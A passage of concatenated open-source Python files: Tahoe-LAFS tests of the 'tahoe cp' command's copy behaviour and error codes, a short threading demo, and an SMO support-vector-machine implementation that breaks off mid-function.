self.failUnlessEqual(filetype, "filenode")
self.failIf(data['mutable'])
self.failUnlessIn("ro_uri", data)
self.failUnlessEqual(to_str(data["ro_uri"]), self.childuris["imm2"])
d.addCallback(_process_imm2_json)
return d
def test_cp_overwrite_readonly_mutable_file(self):
# tahoe cp should print an error when asked to overwrite a
# mutable file that it can't overwrite.
self.basedir = "cli/Cp/overwrite_readonly_mutable_file"
self.set_up_grid()
# This is our initial file. We'll link its readcap into the
# tahoe: alias.
test_file_path = os.path.join(self.basedir, "test_file.txt")
test_file_contents = "This is a test file."
fileutil.write(test_file_path, test_file_contents)
# This is our replacement file. We'll try and fail to upload it
# over the readcap that we linked into the tahoe: alias.
replacement_file_path = os.path.join(self.basedir, "replacement.txt")
replacement_file_contents = "These are new contents."
fileutil.write(replacement_file_path, replacement_file_contents)
d = self.do_cli("create-alias", "tahoe:")
d.addCallback(lambda ignored:
self.do_cli("put", "--mutable", test_file_path))
def _get_test_uri((rc, out, err)):
self.failUnlessEqual(rc, 0)
# this should be a write uri
self._test_write_uri = out
d.addCallback(_get_test_uri)
d.addCallback(lambda ignored:
self.do_cli("ls", "--json", self._test_write_uri))
def _process_test_json((rc, out, err)):
self.failUnlessEqual(rc, 0)
filetype, data = simplejson.loads(out)
self.failUnlessEqual(filetype, "filenode")
self.failUnless(data['mutable'])
self.failUnlessIn("ro_uri", data)
self._test_read_uri = to_str(data["ro_uri"])
d.addCallback(_process_test_json)
# Now we'll link the readonly URI into the tahoe: alias.
d.addCallback(lambda ignored:
self.do_cli("ln", self._test_read_uri, "tahoe:test_file.txt"))
d.addCallback(lambda (rc, out, err):
self.failUnlessEqual(rc, 0))
# Let's grab the json of that to make sure that we did it right.
d.addCallback(lambda ignored:
self.do_cli("ls", "--json", "tahoe:"))
def _process_tahoe_json((rc, out, err)):
self.failUnlessEqual(rc, 0)
filetype, data = simplejson.loads(out)
self.failUnlessEqual(filetype, "dirnode")
self.failUnlessIn("children", data)
kiddata = data['children']
self.failUnlessIn("test_file.txt", kiddata)
testtype, testdata = kiddata['test_file.txt']
self.failUnlessEqual(testtype, "filenode")
self.failUnless(testdata['mutable'])
self.failUnlessIn("ro_uri", testdata)
self.failUnlessEqual(to_str(testdata["ro_uri"]), self._test_read_uri)
self.failIfIn("rw_uri", testdata)
d.addCallback(_process_tahoe_json)
# Okay, now we're going to try uploading another mutable file in
# place of that one. We should get an error.
d.addCallback(lambda ignored:
self.do_cli("cp", replacement_file_path, "tahoe:test_file.txt"))
def _check_error_message((rc, out, err)):
self.failUnlessEqual(rc, 1)
self.failUnlessIn("replace or update requested with read-only cap", err)
d.addCallback(_check_error_message)
# Make extra sure that that didn't work.
d.addCallback(lambda ignored:
self.do_cli("get", "tahoe:test_file.txt"))
d.addCallback(lambda (rc, out, err):
self.failUnlessEqual(out, test_file_contents))
d.addCallback(lambda ignored:
self.do_cli("get", self._test_read_uri))
d.addCallback(lambda (rc, out, err):
self.failUnlessEqual(out, test_file_contents))
# Now we'll do it without an explicit destination.
d.addCallback(lambda ignored:
self.do_cli("cp", test_file_path, "tahoe:"))
d.addCallback(_check_error_message)
d.addCallback(lambda ignored:
self.do_cli("get", "tahoe:test_file.txt"))
d.addCallback(lambda (rc, out, err):
self.failUnlessEqual(out, test_file_contents))
d.addCallback(lambda ignored:
self.do_cli("get", self._test_read_uri))
d.addCallback(lambda (rc, out, err):
self.failUnlessEqual(out, test_file_contents))
# Now we'll link a readonly file into a subdirectory.
d.addCallback(lambda ignored:
self.do_cli("mkdir", "tahoe:testdir"))
d.addCallback(lambda (rc, out, err):
self.failUnlessEqual(rc, 0))
d.addCallback(lambda ignored:
self.do_cli("ln", self._test_read_uri, "tahoe:test/file2.txt"))
d.addCallback(lambda (rc, out, err):
self.failUnlessEqual(rc, 0))
test_dir_path = os.path.join(self.basedir, "test")
fileutil.make_dirs(test_dir_path)
for f in ("file1.txt", "file2.txt"):
fileutil.write(os.path.join(test_dir_path, f), f * 10000)
d.addCallback(lambda ignored:
self.do_cli("cp", "-r", test_dir_path, "tahoe:"))
d.addCallback(_check_error_message)
d.addCallback(lambda ignored:
self.do_cli("ls", "--json", "tahoe:test"))
def _got_testdir_json((rc, out, err)):
self.failUnlessEqual(rc, 0)
filetype, data = simplejson.loads(out)
self.failUnlessEqual(filetype, "dirnode")
self.failUnlessIn("children", data)
childdata = data['children']
self.failUnlessIn("file2.txt", childdata)
file2type, file2data = childdata['file2.txt']
self.failUnlessEqual(file2type, "filenode")
self.failUnless(file2data['mutable'])
self.failUnlessIn("ro_uri", file2data)
self.failUnlessEqual(to_str(file2data["ro_uri"]), self._test_read_uri)
self.failIfIn("rw_uri", file2data)
d.addCallback(_got_testdir_json)
return d
def test_cp_verbose(self):
self.basedir = "cli/Cp/cp_verbose"
self.set_up_grid()
# Write two test files, which we'll copy to the grid.
test1_path = os.path.join(self.basedir, "test1")
test2_path = os.path.join(self.basedir, "test2")
fileutil.write(test1_path, "test1")
fileutil.write(test2_path, "test2")
d = self.do_cli("create-alias", "tahoe")
d.addCallback(lambda ign:
self.do_cli("cp", "--verbose", test1_path, test2_path, "tahoe:"))
def _check(res):
(rc, out, err) = res
self.failUnlessEqual(rc, 0, str(res))
self.failUnlessIn("Success: files copied", out, str(res))
self.failUnlessEqual(err, """\
attaching sources to targets, 2 files / 0 dirs in root
targets assigned, 1 dirs, 2 files
starting copy, 2 files, 1 directories
1/2 files, 0/1 directories
2/2 files, 0/1 directories
1/1 directories
""", str(res))
d.addCallback(_check)
return d
def test_cp_copies_dir(self):
# This test ensures that a directory is copied using
# tahoe cp -r. Refer to ticket #712:
# https://tahoe-lafs.org/trac/tahoe-lafs/ticket/712
self.basedir = "cli/Cp/cp_copies_dir"
self.set_up_grid()
subdir = os.path.join(self.basedir, "foo")
os.mkdir(subdir)
test1_path = os.path.join(subdir, "test1")
fileutil.write(test1_path, "test1")
d = self.do_cli("create-alias", "tahoe")
d.addCallback(lambda ign:
self.do_cli("cp", "-r", subdir, "tahoe:"))
d.addCallback(lambda ign:
self.do_cli("ls", "tahoe:"))
def _check(res, item):
(rc, out, err) = res
self.failUnlessEqual(rc, 0)
self.failUnlessEqual(err, "")
self.failUnlessIn(item, out, str(res))
d.addCallback(_check, "foo")
d.addCallback(lambda ign:
self.do_cli("ls", "tahoe:foo/"))
d.addCallback(_check, "test1")
d.addCallback(lambda ign: fileutil.rm_dir(subdir))
d.addCallback(lambda ign: self.do_cli("cp", "-r", "tahoe:foo", self.basedir))
def _check_local_fs(ign):
self.failUnless(os.path.isdir(self.basedir))
self.failUnless(os.path.isfile(test1_path))
d.addCallback(_check_local_fs)
return d
def test_ticket_2027(self):
# This test ensures that tahoe will copy a file from the grid to
# a local directory without a specified file name.
# https://tahoe-lafs.org/trac/tahoe-lafs/ticket/2027
self.basedir = "cli/Cp/cp_verbose"
self.set_up_grid()
# Write a test file, which we'll copy to the grid.
test1_path = os.path.join(self.basedir, "test1")
fileutil.write(test1_path, "test1")
d = self.do_cli("create-alias", "tahoe")
d.addCallback(lambda ign:
self.do_cli("cp", test1_path, "tahoe:"))
d.addCallback(lambda ign:
self.do_cli("cp", "tahoe:test1", self.basedir))
def _check(res):
(rc, out, err) = res
self.failUnlessIn("Success: file copied", out, str(res))
return d
# these test cases come from ticket #2329 comment 40
# trailing slash on target *directory* should not matter, test both
# trailing slash on target files should cause error
# trailing slash on source directory should not matter, test a few
# trailing slash on source files should cause error
COPYOUT_TESTCASES = """
cp $FILECAP to/existing-file : to/existing-file
cp -r $FILECAP to/existing-file : to/existing-file
cp $DIRCAP/file $PARENTCAP/dir2/file2 to/existing-file : E6-MANYONE
cp -r $DIRCAP/file $PARENTCAP/dir2/file2 to/existing-file : E6-MANYONE
cp $DIRCAP to/existing-file : E4-NEED-R
cp -r $DIRCAP to/existing-file : E5-DIRTOFILE
cp $FILECAP $DIRCAP to/existing-file : E4-NEED-R
cp -r $FILECAP $DIRCAP to/existing-file : E6-MANYONE
cp $FILECAP to/existing-file/ : E7-BADSLASH
cp -r $FILECAP to/existing-file/ : E7-BADSLASH
cp $DIRCAP/file $PARENTCAP/dir2/file2 to/existing-file/ : E7-BADSLASH
cp -r $DIRCAP/file $PARENTCAP/dir2/file2 to/existing-file/ : E7-BADSLASH
cp $DIRCAP to/existing-file/ : E4-NEED-R
cp -r $DIRCAP to/existing-file/ : E7-BADSLASH
cp $FILECAP $DIRCAP to/existing-file/ : E4-NEED-R
cp -r $FILECAP $DIRCAP to/existing-file/ : E7-BADSLASH
# single source to a (present) target directory
cp $FILECAP to : E2-DESTNAME
cp -r $FILECAP to : E2-DESTNAME
cp $DIRCAP/file to : to/file
cp -r $DIRCAP/file to : to/file
# these two are errors
cp $DIRCAP/file/ to : E8-BADSLASH
cp -r $DIRCAP/file/ to : E8-BADSLASH
cp $PARENTCAP/dir to : E4-NEED-R
cp -r $PARENTCAP/dir to : to/dir/file
# but these two should ignore the trailing source slash
cp $PARENTCAP/dir/ to : E4-NEED-R
cp -r $PARENTCAP/dir/ to : to/dir/file
cp $DIRCAP to : E4-NEED-R
cp -r $DIRCAP to : to/file
cp $DIRALIAS to : E4-NEED-R
cp -r $DIRALIAS to : to/file
cp $FILECAP to/ : E2-DESTNAME
cp -r $FILECAP to/ : E2-DESTNAME
cp $DIRCAP/file to/ : to/file
cp -r $DIRCAP/file to/ : to/file
cp $PARENTCAP/dir to/ : E4-NEED-R
cp -r $PARENTCAP/dir to/ : to/dir/file
cp $DIRCAP to/ : E4-NEED-R
cp -r $DIRCAP to/ : to/file
cp $DIRALIAS to/ : E4-NEED-R
cp -r $DIRALIAS to/ : to/file
# multiple sources to a (present) target directory
cp $DIRCAP/file $PARENTCAP/dir2/file2 to : to/file,to/file2
cp $DIRCAP/file $FILECAP to : E2-DESTNAME
cp $DIRCAP $FILECAP to : E4-NEED-R
cp -r $DIRCAP $FILECAP to : E2-DESTNAME
# namedfile, unnameddir, nameddir
cp $PARENTCAP/dir3/file3 $DIRCAP $PARENTCAP/dir2 to : E4-NEED-R
cp -r $PARENTCAP/dir3/file3 $DIRCAP $PARENTCAP/dir2 to : to/file3,to/file,to/dir2/file2
# namedfile, unnameddir, nameddir, unnamedfile
cp $PARENTCAP/dir3/file3 $DIRCAP $PARENTCAP/dir2 $FILECAP to : E4-NEED-R
cp -r $PARENTCAP/dir3/file3 $DIRCAP $PARENTCAP/dir2 $FILECAP to : E2-DESTNAME
cp $DIRCAP/file $PARENTCAP/dir2/file2 to/ : to/file,to/file2
cp $DIRCAP/file $FILECAP to/ : E2-DESTNAME
cp $DIRCAP $FILECAP to/ : E4-NEED-R
cp -r $DIRCAP $FILECAP to/ : E2-DESTNAME
# namedfile, unnameddir, nameddir
cp $PARENTCAP/dir3/file3 $DIRCAP $PARENTCAP/dir2 to/ : E4-NEED-R
cp -r $PARENTCAP/dir3/file3 $DIRCAP $PARENTCAP/dir2 to/ : to/file3,to/file,to/dir2/file2
# namedfile, unnameddir, nameddir, unnamedfile
cp $PARENTCAP/dir3/file3 $DIRCAP $PARENTCAP/dir2 $FILECAP to/ : E4-NEED-R
cp -r $PARENTCAP/dir3/file3 $DIRCAP $PARENTCAP/dir2 $FILECAP to/ : E2-DESTNAME
# single sources to a missing target: should mkdir or create a file
cp $FILECAP to/missing : to/missing
cp -r $FILECAP to/missing : to/missing
cp $DIRCAP/file to/missing : to/missing
cp -r $DIRCAP/file to/missing : to/missing
cp $PARENTCAP/dir to/missing : E4-NEED-R
cp -r $PARENTCAP/dir to/missing : to/missing/dir/file
cp $DIRCAP to/missing : E4-NEED-R
cp -r $DIRCAP to/missing : to/missing/file
cp $DIRALIAS to/missing : E4-NEED-R
cp -r $DIRALIAS to/missing : to/missing/file
cp $FILECAP to/missing/ : E7-BADSLASH
cp -r $FILECAP to/missing/ : E7-BADSLASH
cp $DIRCAP/file to/missing/ : E7-BADSLASH
cp -r $DIRCAP/file to/missing/ : E7-BADSLASH
cp $PARENTCAP/dir to/missing/ : E4-NEED-R
cp -r $PARENTCAP/dir to/missing/ : to/missing/dir/file
cp $DIRCAP to/missing/ : E4-NEED-R
cp -r $DIRCAP to/missing/ : to/missing/file
cp $DIRALIAS to/missing/ : E4-NEED-R
cp -r $DIRALIAS to/missing/ : to/missing/file
# multiple things to a missing target: should mkdir
cp $DIRCAP/file $PARENTCAP/dir2/file2 to/missing : to/missing/file,to/missing/file2
cp -r $DIRCAP/file $PARENTCAP/dir2/file2 to/missing : to/missing/file,to/missing/file2
cp $DIRCAP/file $FILECAP to/missing : E2-DESTNAME
cp -r $DIRCAP/file $FILECAP to/missing : E2-DESTNAME
cp $DIRCAP $FILECAP to/missing : E4-NEED-R
cp -r $DIRCAP $FILECAP to/missing : E2-DESTNAME
# namedfile, unnameddir, nameddir
cp $PARENTCAP/dir3/file3 $DIRCAP $PARENTCAP/dir2 to/missing : E4-NEED-R
cp -r $PARENTCAP/dir3/file3 $DIRCAP $PARENTCAP/dir2 to/missing : to/missing/file3,to/missing/file,to/missing/dir2/file2
# namedfile, unnameddir, nameddir, unnamedfile
cp $PARENTCAP/dir3/file3 $DIRCAP $PARENTCAP/dir2 $FILECAP to/missing : E4-NEED-R
cp -r $PARENTCAP/dir3/file3 $DIRCAP $PARENTCAP/dir2 $FILECAP to/missing : E2-DESTNAME
cp $DIRCAP/file $PARENTCAP/dir2/file2 to/missing/ : to/missing/file,to/missing/file2
cp -r $DIRCAP/file $PARENTCAP/dir2/file2 to/missing/ : to/missing/file,to/missing/file2
cp $DIRCAP/file $FILECAP to/missing/ : E2-DESTNAME
cp -r $DIRCAP/file $FILECAP to/missing/ : E2-DESTNAME
cp $DIRCAP $FILECAP to/missing/ : E4-NEED-R
cp -r $DIRCAP $FILECAP to/missing/ : E2-DESTNAME
# namedfile, unnameddir, nameddir
cp $PARENTCAP/dir3/file3 $DIRCAP $PARENTCAP/dir2 to/missing/ : E4-NEED-R
cp -r $PARENTCAP/dir3/file3 $DIRCAP $PARENTCAP/dir2 to/missing/ : to/missing/file3,to/missing/file,to/missing/dir2/file2
# namedfile, unnameddir, nameddir, unnamedfile
cp $PARENTCAP/dir3/file3 $DIRCAP $PARENTCAP/dir2 $FILECAP to/missing/ : E4-NEED-R
cp -r $PARENTCAP/dir3/file3 $DIRCAP $PARENTCAP/dir2 $FILECAP to/missing/ : E2-DESTNAME
# make sure empty directories are copied too
cp -r $PARENTCAP/dir4 to : to/dir4/emptydir/
cp -r $PARENTCAP/dir4 to/ : to/dir4/emptydir/
# name collisions should cause errors, not overwrites
cp -r $PARENTCAP/dir6/dir $PARENTCAP/dir5/dir to : E9-COLLIDING-TARGETS
cp -r $PARENTCAP/dir5/dir $PARENTCAP/dir6/dir to : E9-COLLIDING-TARGETS
cp -r $DIRCAP6 $DIRCAP5 to : E9-COLLIDING-TARGETS
cp -r $DIRCAP5 $DIRCAP6 to : E9-COLLIDING-TARGETS
"""
class CopyOut(GridTestMixin, CLITestMixin, unittest.TestCase):
    """Exercise 'tahoe cp [-r]' copying files OUT of a Tahoe filesystem.

    Each line of COPYOUT_TESTCASES names a cp invocation (with $CAP
    placeholders) and, after the ':', either the expected resulting local
    paths or an expected error code. do_setup() builds one shared fixture
    grid; run_one_case() resets the local 'to/' target and runs one case.
    """
    # Distinct file bodies so check_output() can tell which source file
    # landed at which local path.
    FILE_CONTENTS = "file text"
    FILE_CONTENTS_5 = "5"
    FILE_CONTENTS_6 = "6"
    def do_setup(self):
        """Build the fixture Tahoe filesystem; returns a Deferred."""
        # first we build a tahoe filesystem that contains:
        #  $PARENTCAP
        #  $PARENTCAP/dir  == $DIRCAP == alias:
        #  $PARENTCAP/dir/file == $FILECAP
        #  $PARENTCAP/dir2        (named directory)
        #  $PARENTCAP/dir2/file2
        #  $PARENTCAP/dir3/file3  (a second named file)
        #  $PARENTCAP/dir4
        #  $PARENTCAP/dir4/emptydir/ (an empty directory)
        #  $PARENTCAP/dir5 == $DIRCAP5
        #  $PARENTCAP/dir5/dir/collide (contents are "5")
        #  $PARENTCAP/dir6 == $DIRCAP6
        #  $PARENTCAP/dir6/dir/collide (contents are "6")
        source_file = os.path.join(self.basedir, "file")
        fileutil.write(source_file, self.FILE_CONTENTS)
        source_file_5 = os.path.join(self.basedir, "file5")
        fileutil.write(source_file_5, self.FILE_CONTENTS_5)
        source_file_6 = os.path.join(self.basedir, "file6")
        fileutil.write(source_file_6, self.FILE_CONTENTS_6)
        d = self.do_cli("mkdir")
        def _stash_parentdircap(res):
            (rc, out, err) = res
            self.failUnlessEqual(rc, 0, str(res))
            self.failUnlessEqual(err, "", str(res))
            self.PARENTCAP = out.strip()
            return self.do_cli("mkdir", "%s/dir" % self.PARENTCAP)
        d.addCallback(_stash_parentdircap)
        def _stash_dircap(res):
            (rc, out, err) = res
            self.failUnlessEqual(rc, 0, str(res))
            self.failUnlessEqual(err, "", str(res))
            self.DIRCAP = out.strip()
            return self.do_cli("add-alias", "ALIAS", self.DIRCAP)
        d.addCallback(_stash_dircap)
        d.addCallback(lambda ign:
                      self.do_cli("put", source_file, "%s/dir/file" % self.PARENTCAP))
        def _stash_filecap(res):
            (rc, out, err) = res
            self.failUnlessEqual(rc, 0, str(res))
            # "put" reports creation on stderr
            self.failUnlessEqual(err.strip(), "201 Created", str(res))
            self.FILECAP = out.strip()
            assert self.FILECAP.startswith("URI:LIT:")
        d.addCallback(_stash_filecap)
        d.addCallback(lambda ign:
                      self.do_cli("mkdir", "%s/dir2" % self.PARENTCAP))
        d.addCallback(lambda ign:
                      self.do_cli("put", source_file, "%s/dir2/file2" % self.PARENTCAP))
        d.addCallback(lambda ign:
                      self.do_cli("mkdir", "%s/dir3" % self.PARENTCAP))
        d.addCallback(lambda ign:
                      self.do_cli("put", source_file, "%s/dir3/file3" % self.PARENTCAP))
        d.addCallback(lambda ign:
                      self.do_cli("mkdir", "%s/dir4" % self.PARENTCAP))
        d.addCallback(lambda ign:
                      self.do_cli("mkdir", "%s/dir4/emptydir" % self.PARENTCAP))
        d.addCallback(lambda ign:
                      self.do_cli("mkdir", "%s/dir5" % self.PARENTCAP))
        def _stash_dircap_5(res):
            (rc, out, err) = res
            self.failUnlessEqual(rc, 0, str(res))
            self.failUnlessEqual(err, "", str(res))
            self.DIRCAP5 = out.strip()
        d.addCallback(_stash_dircap_5)
        d.addCallback(lambda ign:
                      self.do_cli("mkdir", "%s/dir5/dir" % self.PARENTCAP))
        d.addCallback(lambda ign:
                      self.do_cli("put", source_file_5, "%s/dir5/dir/collide" % self.PARENTCAP))
        d.addCallback(lambda ign:
                      self.do_cli("mkdir", "%s/dir6" % self.PARENTCAP))
        def _stash_dircap_6(res):
            (rc, out, err) = res
            self.failUnlessEqual(rc, 0, str(res))
            self.failUnlessEqual(err, "", str(res))
            self.DIRCAP6 = out.strip()
        d.addCallback(_stash_dircap_6)
        d.addCallback(lambda ign:
                      self.do_cli("mkdir", "%s/dir6/dir" % self.PARENTCAP))
        d.addCallback(lambda ign:
                      self.do_cli("put", source_file_6, "%s/dir6/dir/collide" % self.PARENTCAP))
        return d
    def check_output(self):
        """Walk the local 'to/' tree and return a set describing what landed.

        Files are recorded as 'path', 'path=5' or 'path=6' depending on
        contents; directories are recorded with a trailing '/'.
        """
        # locate the files and directories created (if any) under to/
        top = os.path.join(self.basedir, "to")
        results = set()
        for (dirpath, dirnames, filenames) in os.walk(top):
            assert dirpath.startswith(top)
            here = "/".join(dirpath.split(os.sep)[len(top.split(os.sep))-1:])
            results.add(here+"/")
            for fn in filenames:
                contents = fileutil.read(os.path.join(dirpath, fn))
                if contents == self.FILE_CONTENTS:
                    results.add("%s/%s" % (here, fn))
                elif contents == self.FILE_CONTENTS_5:
                    results.add("%s/%s=5" % (here, fn))
                elif contents == self.FILE_CONTENTS_6:
                    results.add("%s/%s=6" % (here, fn))
        return results
    def run_one_case(self, case):
        """Run a single cp case string; fire with the result set or error tag."""
        cmd = (case
               .replace("$PARENTCAP", self.PARENTCAP)
               .replace("$DIRCAP5", self.DIRCAP5)
               .replace("$DIRCAP6", self.DIRCAP6)
               .replace("$DIRCAP", self.DIRCAP)
               .replace("$DIRALIAS", "ALIAS:")
               .replace("$FILECAP", self.FILECAP)
               .split())
        target = cmd[-1]
        _assert(target == "to" or target.startswith("to/"), target)
        cmd[-1] = os.path.abspath(os.path.join(self.basedir, cmd[-1]))
        # reset: start each case with a fresh, empty target directory
        targetdir = os.path.abspath(os.path.join(self.basedir, "to"))
        fileutil.rm_dir(targetdir)
        os.mkdir(targetdir)
        if target.rstrip("/") == "to/existing-file":
            fileutil.write(cmd[-1], "existing file contents\n")
        # The abspath() for cmd[-1] strips a trailing slash, and we want to
        # test what happens when it is present. So put it back.
        if target.endswith("/"):
            cmd[-1] += "/"
        d = self.do_cli(*cmd)
        def _check(res):
            # Map known CLI error messages to the short codes used in the
            # expected-results column of COPYOUT_TESTCASES.
            (rc, out, err) = res
            err = err.strip()
            if rc == 0:
                return self.check_output()
            if rc == 1:
                self.failUnlessEqual(out, "", str(res))
                if "when copying into a directory, all source files must have names, but" in err:
                    return set(["E2-DESTNAME"])
                if err == "cannot copy directories without --recursive":
                    return set(["E4-NEED-R"])
                if err == "cannot copy directory into a file":
                    return set(["E5-DIRTOFILE"])
                if err == "copying multiple things requires target be a directory":
                    return set(["E6-MANYONE"])
                if err == "target is not a directory, but ends with a slash":
                    return set(["E7-BADSLASH"])
                if (err.startswith("source ") and
                    "is not a directory, but ends with a slash" in err):
                    return set(["E8-BADSLASH"])
                if err == "cannot copy multiple files with the same name into the same target directory":
                    return set(["E9-COLLIDING-TARGETS"])
            self.fail("unrecognized error ('%s') %s" % (case, res))
        d.addCallback(_check)
        return d
    def do_one_test(self, case, orig_expected):
        """Run one case and assert the result matches 'orig_expected'
        (augmented with all implied parent directories)."""
        expected = set(orig_expected)
        printable_expected = ",".join(sorted(expected))
        #print "---", case, ":", printable_expected
        for f in orig_expected:
            # f is "dir/file" or "dir/sub/file" or "dir/" or "dir/sub/"
            # we want all parent directories in the set, with trailing /
            pieces = f.rstrip("/").split("/")
            for i in range(1,len(pieces)):
                parent = "/".join(pieces[:i])
                expected.add(parent+"/")
        d = self.run_one_case(case)
        def _dump(got):
            # debugging aid, normally disabled (see commented addCallback)
            ok = "ok" if got == expected else "FAIL"
            printable_got = ",".join(sorted(got))
            print "%-31s: got %-19s, want %-19s %s" % (case, printable_got,
                                                       printable_expected, ok)
            return got
        #d.addCallback(_dump)
        def _check(got):
            self.failUnlessEqual(got, expected, case)
        d.addCallback(_check)
        return d
    def do_tests(self):
        """Run every non-comment line of COPYOUT_TESTCASES, sequentially."""
        # then we run various forms of "cp [-r] TAHOETHING to[/missing]"
        # and see what happens.
        d = defer.succeed(None)
        #print
        for line in COPYOUT_TESTCASES.splitlines():
            if "#" in line:
                line = line[:line.find("#")]
            line = line.strip()
            if not line:
                continue
            case, expected = line.split(":")
            case = case.strip()
            expected = frozenset(expected.strip().split(","))
            # bind case/expected as defaults so each callback keeps its own
            d.addCallback(lambda ign, case=case, expected=expected:
                          self.do_one_test(case, expected))
        return d
    def test_cp_out(self):
        # test copying all sorts of things out of a tahoe filesystem
        self.basedir = "cli_cp/CopyOut/cp_out"
        self.set_up_grid(num_servers=1)
        d = self.do_setup()
        d.addCallback(lambda ign: self.do_tests())
        return d
| gsb-eng/tahoe-lafs | src/allmydata/test/test_cli_cp.py | Python | gpl-2.0 | 44,518 |
from threading import Thread #threading module should be imported
def tryit1():
    """Prompt for a name on stdin and echo a greeting back."""
    user_name = input("Enter your name")
    print("Hi your name is ", user_name)
def tryit2():
    """Burn some CPU with float multiplications, then report completion."""
    for value in range(1, 1000000):
        scratch = value * 2.0
    print("Done")
# Run the two demo functions concurrently: tryit1 blocks on stdin while
# tryit2 burns CPU, demonstrating interleaved execution.
thread1=Thread(target=tryit1) # worker thread running tryit1
thread1.start() # begin executing tryit1 concurrently
thread2=Thread(target=tryit2) # worker thread running tryit2
thread2.start() # begin executing tryit2 concurrently
# Block the main thread until both workers finish.
thread1.join()
thread2.join() | pk-python/basics | basics/concurrency.py | Python | mit | 580 |
from numpy import *
from time import sleep
def loadDataSet(fileName):
    """Parse a tab-separated file into (features, labels).

    Each line holds two float features followed by a float class label.
    """
    features, labels = [], []
    with open(fileName) as handle:
        for raw in handle.readlines():
            parts = raw.strip().split('\t')
            features.append([float(parts[0]), float(parts[1])])
            labels.append(float(parts[2]))
    return features, labels
def selectJrand(i,m):
    """Pick a random alpha index in [0, m) that differs from i."""
    candidate = i  # force at least one draw
    while candidate == i:
        candidate = int(random.uniform(0, m))
    return candidate
def clipAlpha(aj,H,L):
    """Clamp alpha value aj into the box [L, H] (upper bound applied first)."""
    clipped = aj
    if clipped > H:
        clipped = H
    if clipped < L:
        clipped = L
    return clipped
def smoSimple(dataMatIn, classLabels, C, toler, maxIter):
    """Simplified SMO: train a linear SVM and return (b, alphas).

    dataMatIn: training samples; classLabels: +/-1 labels; C: slack
    penalty; toler: KKT tolerance; maxIter: number of consecutive passes
    with no alpha change required before stopping.
    """
    dataMatrix = mat(dataMatIn); labelMat = mat(classLabels).transpose()
    b = 0; m,n = shape(dataMatrix)
    alphas = mat(zeros((m,1)))
    iter = 0
    while (iter < maxIter):
        alphaPairsChanged = 0
        for i in range(m):
            # f(x_i) = sum_j alpha_j * y_j * <x_j, x_i> + b
            fXi = float(multiply(alphas,labelMat).T*(dataMatrix*dataMatrix[i,:].T)) + b
            Ei = fXi - float(labelMat[i])#if checks if an example violates KKT conditions
            if ((labelMat[i]*Ei < -toler) and (alphas[i] < C)) or ((labelMat[i]*Ei > toler) and (alphas[i] > 0)):
                j = selectJrand(i,m)
                fXj = float(multiply(alphas,labelMat).T*(dataMatrix*dataMatrix[j,:].T)) + b
                Ej = fXj - float(labelMat[j])
                alphaIold = alphas[i].copy(); alphaJold = alphas[j].copy()
                # L,H bound alpha_j so both alphas stay in [0,C] on the
                # equality-constraint line.
                if (labelMat[i] != labelMat[j]):
                    L = max(0, alphas[j] - alphas[i])
                    H = min(C, C + alphas[j] - alphas[i])
                else:
                    L = max(0, alphas[j] + alphas[i] - C)
                    H = min(C, alphas[j] + alphas[i])
                if L==H: print("L==H"); continue
                # eta: second derivative of the objective along the constraint
                eta = 2.0 * dataMatrix[i,:]*dataMatrix[j,:].T - dataMatrix[i,:]*dataMatrix[i,:].T - dataMatrix[j,:]*dataMatrix[j,:].T
                if eta >= 0: print("eta>=0"); continue
                alphas[j] -= labelMat[j]*(Ei - Ej)/eta
                alphas[j] = clipAlpha(alphas[j],H,L)
                if (abs(alphas[j] - alphaJold) < 0.00001): print("j not moving enough"); continue
                alphas[i] += labelMat[j]*labelMat[i]*(alphaJold - alphas[j])#update i by the same amount as j
                                                                        #the update is in the opposite direction
                b1 = b - Ei- labelMat[i]*(alphas[i]-alphaIold)*dataMatrix[i,:]*dataMatrix[i,:].T - labelMat[j]*(alphas[j]-alphaJold)*dataMatrix[i,:]*dataMatrix[j,:].T
                b2 = b - Ej- labelMat[i]*(alphas[i]-alphaIold)*dataMatrix[i,:]*dataMatrix[j,:].T - labelMat[j]*(alphas[j]-alphaJold)*dataMatrix[j,:]*dataMatrix[j,:].T
                if (0 < alphas[i]) and (C > alphas[i]): b = b1
                elif (0 < alphas[j]) and (C > alphas[j]): b = b2
                else: b = (b1 + b2)/2.0
                alphaPairsChanged += 1
                print("iter: %d i:%d, pairs changed %d" % (iter,i,alphaPairsChanged))
        if (alphaPairsChanged == 0): iter += 1
        else: iter = 0
        print("iteration number: %d" % iter)
    return b,alphas
def kernelTrans(X, A, kTup): #calc the kernel or transform data to a higher dimensional space
    """Compute the m x 1 kernel column K(X, A).

    kTup is ('lin', 0) for a plain dot-product kernel or
    ('rbf', sigma) for a Gaussian kernel; any other name raises NameError.
    """
    m,n = shape(X)
    K = mat(zeros((m,1)))
    if kTup[0]=='lin': K = X * A.T   #linear kernel
    elif kTup[0]=='rbf':
        for j in range(m):
            deltaRow = X[j,:] - A
            K[j] = deltaRow*deltaRow.T
        K = exp(K/(-1*kTup[1]**2)) #divide in NumPy is element-wise not matrix like Matlab
    else: raise NameError('Houston We Have a Problem -- \
    That Kernel is not recognized')
    return K
class optStruct:
    """Working state for the full Platt SMO optimizer (kernel version)."""
    def __init__(self,dataMatIn, classLabels, C, toler, kTup):  # Initialize the structure with the parameters
        self.X = dataMatIn
        self.labelMat = classLabels
        self.C = C
        self.tol = toler
        self.m = shape(dataMatIn)[0]   # number of training samples
        self.alphas = mat(zeros((self.m,1)))
        self.b = 0
        self.eCache = mat(zeros((self.m,2))) #first column is valid flag
        self.K = mat(zeros((self.m,self.m)))
        # Precompute the full m x m kernel matrix, one column per sample.
        for i in range(self.m):
            self.K[:,i] = kernelTrans(self.X, self.X[i,:], kTup)
def calcEk(oS, k):
    """Prediction error E_k = f(x_k) - y_k for sample k (kernel version)."""
    prediction = float(multiply(oS.alphas, oS.labelMat).T * oS.K[:, k] + oS.b)
    return prediction - float(oS.labelMat[k])
def selectJ(i, oS, Ei): #this is the second choice -heurstic, and calcs Ej
    """Choose the second alpha index j maximizing |Ei - Ek|; return (j, Ej).

    Falls back to a random index on the first pass, when the error cache
    holds no other valid entries yet.
    """
    maxK = -1; maxDeltaE = 0; Ej = 0
    oS.eCache[i] = [1,Ei]  #set valid #choose the alpha that gives the maximum delta E
    validEcacheList = nonzero(oS.eCache[:,0].A)[0]
    if (len(validEcacheList)) > 1:
        for k in validEcacheList:   #loop through valid Ecache values and find the one that maximizes delta E
            if k == i: continue #don't calc for i, waste of time
            Ek = calcEk(oS, k)
            deltaE = abs(Ei - Ek)
            if (deltaE > maxDeltaE):
                maxK = k; maxDeltaE = deltaE; Ej = Ek
